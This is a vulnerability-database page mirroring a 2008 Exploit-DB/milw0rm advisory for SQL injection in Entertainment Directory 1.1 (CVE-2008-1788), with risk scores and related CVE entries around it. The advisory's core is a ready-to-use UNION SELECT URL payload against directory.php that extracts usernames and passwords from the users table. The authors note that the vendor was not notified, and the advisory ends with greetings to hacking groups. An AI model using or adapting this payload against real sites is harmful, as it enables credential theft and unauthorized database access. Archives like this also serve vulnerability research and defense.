Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbT0pP8uZzEDB-ID:5371
HistoryApr 05, 2008 - 12:00 a.m.

Entertainment Directory 1.1 - SQL Injection

2008-04-0500:00:00
t0pP8uZz
www.exploit-db.com
24

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

58.2%

JSON
--==+================================================================================+==--
--==+	       Entertainment Directory <= 1.1 SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
Script Download: http://www.turnkeyzone.com
DORK: N/A
Vendor Has Not Been Notified!


DESCRIPTION: 
Entertainment directory is vulnerable due to a insecure mysql query. this allows the remote attacker
to obtain user credentials from the database.


EXPLOITS:
http://site.com/directory.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9,10,11,12,13,14/**/FROM/**/users/*



NOTE/TIP: 


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew!



--==+================================================================================+==--
--==+	       Entertainment Directory <= 1.1 SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]

Related

cve 1
prion 1
nvd 1
cvelist 1
cve
cve
CVE-2008-1788
2008-04-15 17:05:00
prion
prion
Sql injection
2008-04-15 17:05:00
nvd
nvd
CVE-2008-1788
2008-04-15 17:05:00
cvelist
cvelist
CVE-2008-1788
2008-04-15 17:00:00

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

58.2%

JSON
Related for EDB-ID:5371
cve1prion1nvd1cvelist1